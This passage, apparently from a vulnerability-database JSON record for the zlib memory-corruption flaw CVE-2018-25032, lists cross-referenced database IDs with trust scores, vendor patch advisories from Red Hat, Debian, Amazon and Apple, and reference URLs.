"db": "CS-HELP",
"id": "SB2022072010",
"trust": 0.6
},
{
"db": "CS-HELP",
"id": "SB2022060505",
"trust": 0.6
},
{
"db": "CS-HELP",
"id": "SB2022042114",
"trust": 0.6
},
{
"db": "CS-HELP",
"id": "SB2022051324",
"trust": 0.6
},
{
"db": "CS-HELP",
"id": "SB2022060127",
"trust": 0.6
},
{
"db": "CS-HELP",
"id": "SB2022061722",
"trust": 0.6
},
{
"db": "CS-HELP",
"id": "SB2022070735",
"trust": 0.6
},
{
"db": "CS-HELP",
"id": "SB2022053131",
"trust": 0.6
},
{
"db": "CS-HELP",
"id": "SB2022060816",
"trust": 0.6
},
{
"db": "CS-HELP",
"id": "SB2022053025",
"trust": 0.6
},
{
"db": "CS-HELP",
"id": "SB2022070643",
"trust": 0.6
},
{
"db": "CS-HELP",
"id": "SB2022051742",
"trust": 0.6
},
{
"db": "CS-HELP",
"id": "SB2022040111",
"trust": 0.6
},
{
"db": "CS-HELP",
"id": "SB2022051235",
"trust": 0.6
},
{
"db": "CS-HELP",
"id": "SB2022062931",
"trust": 0.6
},
{
"db": "CS-HELP",
"id": "SB2022070507",
"trust": 0.6
},
{
"db": "CS-HELP",
"id": "SB2022040603",
"trust": 0.6
},
{
"db": "PACKETSTORM",
"id": "166856",
"trust": 0.6
},
{
"db": "CNNVD",
"id": "CNNVD-202203-2221",
"trust": 0.6
},
{
"db": "PACKETSTORM",
"id": "167271",
"trust": 0.2
},
{
"db": "PACKETSTORM",
"id": "167265",
"trust": 0.2
},
{
"db": "PACKETSTORM",
"id": "166552",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "167133",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "166967",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "167381",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "167122",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "171157",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "167225",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "167140",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "167277",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "167330",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "167485",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "167334",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "167116",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "167389",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "166555",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "167223",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "168036",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "167134",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "167364",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "167594",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "171152",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "167188",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "167936",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "167138",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "167586",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "167186",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "167470",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "167119",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "167136",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "167674",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "167124",
"trust": 0.1
},
{
"db": "VULHUB",
"id": "VHN-418557",
"trust": 0.1
},
{
"db": "ICS CERT",
"id": "ICSA-23-348-10",
"trust": 0.1
},
{
"db": "VULMON",
"id": "CVE-2018-25032",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "171159",
"trust": 0.1
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-418557"
},
{
"db": "VULMON",
"id": "CVE-2018-25032"
},
{
"db": "PACKETSTORM",
"id": "167622"
},
{
"db": "PACKETSTORM",
"id": "167271"
},
{
"db": "PACKETSTORM",
"id": "169897"
},
{
"db": "PACKETSTORM",
"id": "171159"
},
{
"db": "PACKETSTORM",
"id": "169782"
},
{
"db": "PACKETSTORM",
"id": "167346"
},
{
"db": "PACKETSTORM",
"id": "167265"
},
{
"db": "PACKETSTORM",
"id": "167679"
},
{
"db": "CNNVD",
"id": "CNNVD-202203-2221"
},
{
"db": "NVD",
"id": "CVE-2018-25032"
}
]
},
"id": "VAR-202203-1690",
"iot": {
"_id": null,
"data": true,
"sources": [
{
"db": "VULHUB",
"id": "VHN-418557"
}
],
"trust": 0.6566514
},
"last_update_date": "2026-03-09T20:35:07.026000Z",
"patch": {
"_id": null,
"data": [
{
"title": "zlib Buffer error vulnerability fix",
"trust": 0.6,
"url": "http://123.124.177.30/web/xxk/bdxqById.tag?id=187366"
},
{
"title": "Debian Security Advisories: DSA-5111-1 zlib -- security update",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=debian_security_advisories\u0026qid=1953a09ed6b6acb885ad5f0bc5c6a1cb"
},
{
"title": "Debian CVElist Bug Report Logs: CVE-2018-25032: zlib memory corruption on deflate",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=debian_cvelist_bugreportlogs\u0026qid=aa0fc3d1bfe74e5ba24eb36e6014b06b"
},
{
"title": "Amazon Linux AMI: ALAS-2022-1602",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=amazon_linux_ami\u0026qid=ALAS-2022-1602"
},
{
"title": "Amazon Linux AMI: ALAS-2022-1640",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=amazon_linux_ami\u0026qid=ALAS-2022-1640"
},
{
"title": "Amazon Linux 2: ALAS2-2022-1772",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=amazon_linux2\u0026qid=ALAS2-2022-1772"
},
{
"title": "Amazon Linux 2022: ALAS2022-2022-159",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=amazon_linux2022\u0026qid=ALAS2022-2022-159"
},
{
"title": "Amazon Linux 2022: ALAS2022-2022-100",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=amazon_linux2022\u0026qid=ALAS2022-2022-100"
},
{
"title": "Red Hat: ",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_cve_database\u0026qid=CVE-2018-25032"
},
{
"title": "Red Hat: Important: zlib security update",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20224845 - Security Advisory"
},
{
"title": "Red Hat: Important: zlib security update",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20221642 - Security Advisory"
},
{
"title": "Red Hat: Important: zlib security update",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20221591 - Security Advisory"
},
{
"title": "Red Hat: Important: rsync security update",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20222197 - Security Advisory"
},
{
"title": "Red Hat: Important: rsync security update",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20222192 - Security Advisory"
},
{
"title": "Red Hat: Important: mingw-zlib security update",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20227813 - Security Advisory"
},
{
"title": "Red Hat: Important: rsync security update",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20224592 - Security Advisory"
},
{
"title": "Red Hat: Important: zlib security update",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20230976 - Security Advisory"
},
{
"title": "Red Hat: Important: zlib security update",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20222214 - Security Advisory"
},
{
"title": "Red Hat: Important: zlib security update",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20222213 - Security Advisory"
},
{
"title": "Red Hat: Important: rsync security update",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20222201 - Security Advisory"
},
{
"title": "Red Hat: Important: rsync security update",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20222198 - Security Advisory"
},
{
"title": "Red Hat: Important: zlib security update",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20221661 - Security Advisory"
},
{
"title": "Red Hat: Important: zlib security update",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20224584 - Security Advisory"
},
{
"title": "Red Hat: Important: zlib security update",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20230943 - Security Advisory"
},
{
"title": "Red Hat: Important: mingw-zlib security update",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20228420 - Security Advisory"
},
{
"title": "Arch Linux Issues: ",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=arch_linux_issues\u0026qid=CVE-2018-25032"
},
{
"title": "Red Hat: Moderate: OpenShift Container Platform 4.9.35 bug fix and security update",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20222283 - Security Advisory"
},
{
"title": "Red Hat: Moderate: OpenShift Container Platform 4.6.58 bug fix and security update",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20222264 - Security Advisory"
},
{
"title": "Red Hat: Moderate: OpenShift Container Platform 4.7.51 security update",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20222268 - Security Advisory"
},
{
"title": "Red Hat: Moderate: OpenShift Container Platform 4.6.58 security and extras update",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20222265 - Security Advisory"
},
{
"title": "Red Hat: Moderate: OpenShift Virtualization 4.10.2 Images security and bug fix update",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20225026 - Security Advisory"
},
{
"title": "Red Hat: Important: RHV-H security update (redhat-virtualization-host) 4.3.23",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20225439 - Security Advisory"
},
{
"title": "Amazon Linux 2022: ALAS2022-2022-158",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=amazon_linux2022\u0026qid=ALAS2022-2022-158"
},
{
"title": "Red Hat: Moderate: Cryostat 2.1.1: new Cryostat on RHEL 8 container images",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20224985 - Security Advisory"
},
{
"title": "Red Hat: Important: Red Hat OpenShift GitOps security update",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20225152 - Security Advisory"
},
{
"title": "Red Hat: Important: Red Hat OpenShift GitOps security update",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20225187 - Security Advisory"
},
{
"title": "Red Hat: Important: Red Hat OpenShift GitOps security update",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20225192 - Security Advisory"
},
{
"title": "Brocade Security Advisories: Access Denied",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=brocade_security_advisories\u0026qid=ac82ca9e02281afb3f0356588beedb43"
},
{
"title": "Red Hat: Moderate: Release of OpenShift Serverless Version 1.22.1",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20224863 - Security Advisory"
},
{
"title": "Red Hat: Moderate: Release of containers for OSP 16.2.z director operator tech preview",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20222183 - Security Advisory"
},
{
"title": "Red Hat: Important: OpenShift Virtualization 4.8.7 Images bug fixes and security update",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20226890 - Security Advisory"
},
{
"title": "Red Hat: Important: Red Hat OpenShift GitOps security update",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20224691 - Security Advisory"
},
{
"title": "Red Hat: Moderate: OpenShift Container Platform 4.8.41 bug fix and security update",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20222272 - Security Advisory"
},
{
"title": "Red Hat: Important: Red Hat OpenShift GitOps security update",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20224671 - Security Advisory"
},
{
"title": "Red Hat: Important: Red Hat OpenShift GitOps security update",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20224692 - Security Advisory"
},
{
"title": "Red Hat: Moderate: Cryostat 2.1.0: new Cryostat on RHEL 8 container images",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20221679 - Security Advisory"
},
{
"title": "Red Hat: Moderate: security update for rh-sso-7/sso75-openshift-rhel8 container image",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20221713 - Security Advisory"
},
{
"title": "Red Hat: Moderate: Secondary Scheduler Operator for Red Hat OpenShift 1.0.1 security update",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20225699 - Security Advisory"
},
{
"title": "Red Hat: Important: RHACS 3.69 security update",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20225188 - Security Advisory"
},
{
"title": "Red Hat: Moderate: ACS 3.70 enhancement and security update",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20224880 - Security Advisory"
},
{
"title": "Red Hat: Moderate: OpenShift Container Platform 3.11.705 security update",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20222281 - Security Advisory"
},
{
"title": "Red Hat: Important: Red Hat OpenShift GitOps security update",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20224690 - Security Advisory"
},
{
"title": "Red Hat: Important: RHACS 3.68 security update",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20225132 - Security Advisory"
},
{
"title": "Red Hat: Moderate: Red Hat Advanced Cluster Management 2.3.10 security updates and bug fixes",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20221715 - Security Advisory"
},
{
"title": "Red Hat: Moderate: Red Hat OpenShift Logging Security and Bug update Release 5.4.1",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20222216 - Security Advisory"
},
{
"title": "Red Hat: Moderate: Openshift Logging Security and Bug update Release (5.2.10)",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20222218 - Security Advisory"
},
{
"title": "Red Hat: Moderate: Red Hat OpenShift Logging Security and Bug update Release 5.3.7",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20222217 - Security Advisory"
},
{
"title": "Red Hat: Moderate: Red Hat Advanced Cluster Management 2.4.4 security updates and bug fixes",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20221681 - Security Advisory"
},
{
"title": "Red Hat: Important: Red Hat OpenShift Service Mesh 2.1.3 Containers security update",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20225006 - Security Advisory"
},
{
"title": "Red Hat: Low: Release of OpenShift Serverless Version 1.22.0",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20221747 - Security Advisory"
},
{
"title": "Red Hat: Moderate: Migration Toolkit for Containers (MTC) 1.7.3 security and bug fix update",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20225840 - Security Advisory"
},
{
"title": "Apple: macOS Monterey 12.4",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=apple_security_advisories\u0026qid=73857ee26a600b1527481f1deacc0619"
},
{
"title": "Red Hat: Moderate: Migration Toolkit for Containers (MTC) 1.6.5 security and bug fix update",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20224814 - Security Advisory"
},
{
"title": "Red Hat: Moderate: Migration Toolkit for Containers (MTC) 1.7.2 security and bug fix update",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20225483 - Security Advisory"
},
{
"title": "Red Hat: Moderate: OpenShift Container Platform 4.11.0 extras and security update",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20225070 - Security Advisory"
},
{
"title": "Red Hat: Important: OpenShift Virtualization 4.11.0 Images security and bug fix update",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20226526 - Security Advisory"
},
{
"title": "Red Hat: Important: Migration Toolkit for Containers (MTC) 1.7.4 security and bug fix update",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20226429 - Security Advisory"
},
{
"title": "Red Hat: Moderate: Red Hat Advanced Cluster Management 2.4.5 security updates and bug fixes",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20225201 - Security Advisory"
},
{
"title": "Red Hat: Moderate: Red Hat Advanced Cluster Management 2.3.11 security updates and bug fixes",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20225392 - Security Advisory"
},
{
"title": "Red Hat: Important: Red Hat OpenShift Data Foundation 4.13.0 security and bug fix update",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20233742 - Security Advisory"
},
{
"title": "Red Hat: Important: Service Telemetry Framework 1.4 security update",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20225924 - Security Advisory"
},
{
"title": "Red Hat: Important: OpenShift Container Platform 4.11.0 bug fix and security update",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20225069 - Security Advisory"
},
{
"title": "SSZipArchive",
"trust": 0.1,
"url": "https://github.com/ZipArchive/ZipArchive "
},
{
"title": "UnityReleaseNotes",
"trust": 0.1,
"url": "https://github.com/mario206/UnityReleaseNotes "
},
{
"title": "zlib-patch-demo",
"trust": 0.1,
"url": "https://github.com/chainguard-dev/zlib-patch-demo "
},
{
"title": "ReptileIndexOfProject",
"trust": 0.1,
"url": "https://github.com/Webb-L/reptileIndexOfProject "
},
{
"title": "UnityReleaseNotes",
"trust": 0.1,
"url": "https://github.com/mario206/UnityReleaseNotes-latest "
},
{
"title": "snyk-to-cve",
"trust": 0.1,
"url": "https://github.com/yeforriak/snyk-to-cve "
},
{
"title": "GitHub Actions CI App Pipeline",
"trust": 0.1,
"url": "https://github.com/isgo-golgo13/gokit-gorillakit-enginesvc "
},
{
"title": "veracode-container-security-finding-parser",
"trust": 0.1,
"url": "https://github.com/vincent-deng/veracode-container-security-finding-parser "
},
{
"title": "The Register",
"trust": 0.1,
"url": "https://www.theregister.co.uk/2022/03/30/zlib_data_bug/"
}
],
"sources": [
{
"db": "VULMON",
"id": "CVE-2018-25032"
},
{
"db": "CNNVD",
"id": "CNNVD-202203-2221"
}
]
},
"problemtype_data": {
"_id": null,
"data": [
{
"problemtype": "CWE-787",
"trust": 1.1
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-418557"
},
{
"db": "NVD",
"id": "CVE-2018-25032"
}
]
},
"references": {
"_id": null,
"data": [
{
"trust": 1.9,
"url": "https://www.debian.org/security/2022/dsa-5111"
},
{
"trust": 1.8,
"url": "https://cert-portal.siemens.com/productcert/pdf/ssa-333517.pdf"
},
{
"trust": 1.8,
"url": "https://security.netapp.com/advisory/ntap-20220729-0004/"
},
{
"trust": 1.8,
"url": "https://github.com/madler/zlib/compare/v1.2.11...v1.2.12"
},
{
"trust": 1.8,
"url": "https://security.netapp.com/advisory/ntap-20220526-0009/"
},
{
"trust": 1.8,
"url": "https://support.apple.com/kb/ht213255"
},
{
"trust": 1.8,
"url": "https://support.apple.com/kb/ht213256"
},
{
"trust": 1.8,
"url": "https://support.apple.com/kb/ht213257"
},
{
"trust": 1.8,
"url": "http://seclists.org/fulldisclosure/2022/may/38"
},
{
"trust": 1.8,
"url": "http://seclists.org/fulldisclosure/2022/may/35"
},
{
"trust": 1.8,
"url": "http://seclists.org/fulldisclosure/2022/may/33"
},
{
"trust": 1.8,
"url": "https://security.gentoo.org/glsa/202210-42"
},
{
"trust": 1.8,
"url": "https://github.com/madler/zlib/commit/5c44459c3b28a9bd3283aaceab7c615f8020c531"
},
{
"trust": 1.8,
"url": "https://github.com/madler/zlib/issues/605"
},
{
"trust": 1.8,
"url": "https://www.openwall.com/lists/oss-security/2022/03/24/1"
},
{
"trust": 1.8,
"url": "https://www.openwall.com/lists/oss-security/2022/03/28/1"
},
{
"trust": 1.8,
"url": "https://www.openwall.com/lists/oss-security/2022/03/28/3"
},
{
"trust": 1.8,
"url": "https://www.oracle.com/security-alerts/cpujul2022.html"
},
{
"trust": 1.8,
"url": "https://lists.debian.org/debian-lts-announce/2022/04/msg00000.html"
},
{
"trust": 1.8,
"url": "https://lists.debian.org/debian-lts-announce/2022/05/msg00008.html"
},
{
"trust": 1.8,
"url": "https://lists.debian.org/debian-lts-announce/2022/09/msg00023.html"
},
{
"trust": 1.8,
"url": "http://www.openwall.com/lists/oss-security/2022/03/25/2"
},
{
"trust": 1.8,
"url": "http://www.openwall.com/lists/oss-security/2022/03/26/1"
},
{
"trust": 1.4,
"url": "https://access.redhat.com/security/cve/cve-2018-25032"
},
{
"trust": 1.1,
"url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/ns2d2gfpfgojul4wq3duay7hf4vwq77f/"
},
{
"trust": 1.1,
"url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/xokfmsnq5d5wgmalbnbxu3ge442v74wu/"
},
{
"trust": 1.1,
"url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/voknp2l734ael47nrygvzikefoubqy5y/"
},
{
"trust": 1.1,
"url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/df62mvmh3qugmbdcb3dy2erq6ebhtadb/"
},
{
"trust": 1.1,
"url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/jzzptwryqulaol3aw7rzjnvz2uonxcv4/"
},
{
"trust": 1.1,
"url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/dczfijbjtz7cl5qxbfktq22q26vinruf/"
},
{
"trust": 0.8,
"url": "https://access.redhat.com/security/team/contact/"
},
{
"trust": 0.8,
"url": "https://bugzilla.redhat.com/):"
},
{
"trust": 0.8,
"url": "https://listman.redhat.com/mailman/listinfo/rhsa-announce"
},
{
"trust": 0.8,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-25032"
},
{
"trust": 0.7,
"url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/voknp2l734ael47nrygvzikefoubqy5y/"
},
{
"trust": 0.7,
"url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/jzzptwryqulaol3aw7rzjnvz2uonxcv4/"
},
{
"trust": 0.7,
"url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ns2d2gfpfgojul4wq3duay7hf4vwq77f/"
},
{
"trust": 0.7,
"url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/df62mvmh3qugmbdcb3dy2erq6ebhtadb/"
},
{
"trust": 0.7,
"url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/dczfijbjtz7cl5qxbfktq22q26vinruf/"
},
{
"trust": 0.7,
"url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/xokfmsnq5d5wgmalbnbxu3ge442v74wu/"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2022.2900"
},
{
"trust": 0.6,
"url": "https://packetstormsecurity.com/files/168011/red-hat-security-advisory-2022-5924-01.html"
},
{
"trust": 0.6,
"url": "https://packetstormsecurity.com/files/168696/red-hat-security-advisory-2022-6890-01.html"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2022.2709"
},
{
"trust": 0.6,
"url": "https://www.cybersecurity-help.cz/vdb/sb2022060127"
},
{
"trust": 0.6,
"url": "https://packetstormsecurity.com/files/169897/red-hat-security-advisory-2022-8420-01.html"
},
{
"trust": 0.6,
"url": "https://packetstormsecurity.com/files/167281/red-hat-security-advisory-2022-2265-01.html"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2022.5062"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2022.6112"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2022.2474"
},
{
"trust": 0.6,
"url": "https://www.cybersecurity-help.cz/vdb/sb2022070643"
},
{
"trust": 0.6,
"url": "https://www.cybersecurity-help.cz/vdb/sb2022051742"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2022.2598"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2022.1403"
},
{
"trust": 0.6,
"url": "https://packetstormsecurity.com/files/168352/red-hat-security-advisory-2022-6429-01.html"
},
{
"trust": 0.6,
"url": "https://packetstormsecurity.com/files/167602/red-hat-security-advisory-2022-5201-01.html"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2022.1366"
},
{
"trust": 0.6,
"url": "https://www.cybersecurity-help.cz/vdb/sb2022051703"
},
{
"trust": 0.6,
"url": "https://packetstormsecurity.com/files/169624/gentoo-linux-security-advisory-202210-42.html"
},
{
"trust": 0.6,
"url": "https://cxsecurity.com/cveshow/cve-2018-25032/"
},
{
"trust": 0.6,
"url": "https://packetstormsecurity.com/files/169782/red-hat-security-advisory-2022-7813-01.html"
},
{
"trust": 0.6,
"url": "https://www.cybersecurity-help.cz/vdb/sb2022040111"
},
{
"trust": 0.6,
"url": "https://packetstormsecurity.com/files/167327/red-hat-security-advisory-2022-2281-01.html"
},
{
"trust": 0.6,
"url": "https://www.cybersecurity-help.cz/vdb/sb2022060816"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2023.1695"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2022.3050"
},
{
"trust": 0.6,
"url": "https://support.apple.com/en-us/ht213255"
},
{
"trust": 0.6,
"url": "https://www.cybersecurity-help.cz/vdb/sb2022053131"
},
{
"trust": 0.6,
"url": "https://www.cybersecurity-help.cz/vdb/sb2022033020"
},
{
"trust": 0.6,
"url": "https://packetstormsecurity.com/files/166856/red-hat-security-advisory-2022-1591-01.html"
},
{
"trust": 0.6,
"url": "https://www.cybersecurity-help.cz/vdb/sb2022070735"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2022.2561"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2022.3299"
},
{
"trust": 0.6,
"url": "https://packetstormsecurity.com/files/167008/red-hat-security-advisory-2022-1747-01.html"
},
{
"trust": 0.6,
"url": "https://packetstormsecurity.com/files/167679/red-hat-security-advisory-2022-5483-01.html"
},
{
"trust": 0.6,
"url": "https://www.cybersecurity-help.cz/vdb/sb2022051235"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2022.3136"
},
